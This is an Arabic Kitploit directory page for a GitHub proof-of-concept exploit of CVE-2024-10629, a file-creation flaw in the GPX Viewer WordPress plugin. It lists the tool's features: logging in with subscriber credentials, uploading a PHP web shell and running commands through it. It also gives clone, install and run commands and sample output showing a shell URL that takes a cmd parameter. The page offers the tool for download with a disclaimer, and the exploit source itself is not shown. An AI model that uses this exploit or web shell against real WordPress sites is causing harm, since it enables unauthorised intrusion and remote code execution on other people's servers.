Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/nxploited/cve-2024-10629
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubnxploited/cve-2024-10629

CVE-2024-10629

GPX Viewer <= 2.2.8 - مستخدم مصادق عليه (Subscriber+) إنشاء ملف تعسفي

عرض المستودع
1منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

🛠️ استغلال ثغرة GPX Viewer (CVE-2024-10629)

يحتوي هذا المستودع على إثبات مفهوم لاستغلال الثغرة في إضافة GPX Viewer لووردبريس، والتي تسمح بإنشاء ملفات عشوائية (CVE-2024-10629). تسمح الثغرة للمهاجمين الموثّقين بمستوى وصول المشتركين أو أعلى بإنشاء ملفات عشوائية على خادم الموقع المتأثر، مما قد يؤدي إلى تنفيذ أكواد عن بُعد.

📝 تفاصيل CVE

  • CVE ID: CVE-2024-10629
  • Published: 2024-11-13
  • Updated: 2024-11-13
  • Vulnerable Plugin: GPX Viewer <= 2.2.8
  • Vulnerability Type: إنشاء ملف عشوائي بواسطة مستخدم موثّق (مشترك+)
  • Score: 8.8 عالي
  • Severity: عالي
  • Version: 3.1
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

الوصف

إضافة GPX Viewer لووردبريس معرضة لثغرة إنشاء ملف عشوائي بسبب عدم وجود فحص للصلاحية والتحقق من نوع الملف في الدالة gpxv_file_upload() في جميع الإصدارات حتى 2.2.8. مما يسمح للمهاجمين الموثّقين بمستوى وصول المشتركين أو أعلى بإنشاء ملفات عشوائية على خادم الموقع المتأثر، مما قد يؤدي إلى تنفيذ أكواد عن بُعد.

🚀 الميزات

  • تسجيل دخول تلقائي باستخدام اسم المستخدم وكلمة المرور المقدمة.
  • التحقق من إصدار إضافة GPX Viewer.
  • رفع قشرة PHP (shell) إلى الخادم.
  • التحقق من نجاح رفع القشرة.
  • تنفيذ الأوامر على الخادم عبر القشرة المرفوعة.

📚 الاستخدام

المتطلبات الأساسية

  • Python 3.x
  • مكتبة requests

تشغيل الأداة

  1. استنساخ المستودع:

    root@kitploit:~
    git clone https://github.com/Nxploited/CVE-2024-10629/
    cd CVE-2024-10629
    
  2. تثبيت المكتبة المطلوبة:

    root@kitploit:~
    pip install requests
    
  3. تشغيل الأداة:

    root@kitploit:~
    python exploit.py -u <target_url> -un <username> -p <password>
    

    استبدل <target_url> و<username> و<password> بالقيم المناسبة.

مثال

root@kitploit:~
python CVE-2024-10629.py -u http://example.com/wordpress -un subscriber -p subscriber_password

المخرجات

  • سيقوم السكريبت بإخراج إصدار الإضافة والتحقق مما إذا كان ضعيفاً.
  • ثم سيسجل الدخول باستخدام بيانات الاعتماد المقدمة ويحاول رفع القشرة.
  • إذا نجح، سيتحقق من رفع القشرة وينفذ أمرًا نموذجياً (ls).
root@kitploit:~
[+] WordPress plugin version: 2.2.8
[+] Vulnerable version detected. Proceeding with exploitation...
[+] Logged in successfully.
[+] Shell uploaded. Checking shell...
[+] Shell uploaded successfully.
[+] Shell URL: http://example.com/wp-content/uploads/gpx/uncategorized/nxploit_exploit.php
[+] Command output:
http://example.com/wp-content/uploads/gpx/uncategorized/nxploit_exploit.php?cmd=ls
index.php
wp-admin
wp-content
wp-includes
...

أمثلة الأوامر

  • ls = عرض الملفات
  • uname -a = عرض معلومات النظام

⚠️ إخلاء مسؤولية

هذه الأداة مخصصة للأغراض التعليمية والاختبار المصرح به فقط. الاستخدام غير المصرح به لهذه الأداة ضد أنظمة لا تملكها أو ليس لديك إذن صريح باختبارها هو غير قانوني وغير أخلاقي. المؤلفون والمساهمون في هذا المستودع غير مسؤولين عن أي سوء استخدام أو ضرر ناتج عن هذه الأداة.


بواسطة: Khaled Alenazi (Nxploit)

تنزيل الأداة